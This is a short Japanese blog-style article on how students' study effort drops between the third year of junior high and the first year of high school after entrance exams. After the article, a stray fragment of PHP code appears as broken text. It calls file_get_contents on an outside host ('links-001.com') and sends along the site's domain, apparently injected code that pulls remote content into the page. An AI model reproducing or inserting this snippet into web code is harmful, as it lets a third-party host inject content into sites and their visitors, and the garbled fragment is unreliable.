前へ
次へ

中学3年生と高校1年での勉強量に差が出る

学生時代には多くの人が受験を経験します。
そしてその最初が高校受験になるでしょう。
中学までは義務教育なので受験しなくても行けますが、高校は受験なしではいけません。
中高一貫校などに行く人は高校進学時は不要ですが中学進学時により厳しい受験を潜り抜けている生徒もいるでしょう。
高校受験で大きく影響するのは内申点で、中学3年次等の成績によってある程度進路が振り分けられます。
先生としては確実に進学できる学校を提示するので、その学校を受験すれば入試でよほど大ミスをしない限りには志望校に行けるでしょう。
とは言いながら多くの生徒は入試対策を一生懸命します。
中学3年次はそれ以前よりも勉強しているはずです。
では高校1年になったらどうかですが途端に勉強量が減ってしまうようです。
特にある程度目標を持って高校受験をしてうまく合格できた人はより高校1年で安心してしまいがちです。
この点からすると中高一貫校なら中三と高一の変化が少ないので大学進学対策などに取り組みやすくなるのでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top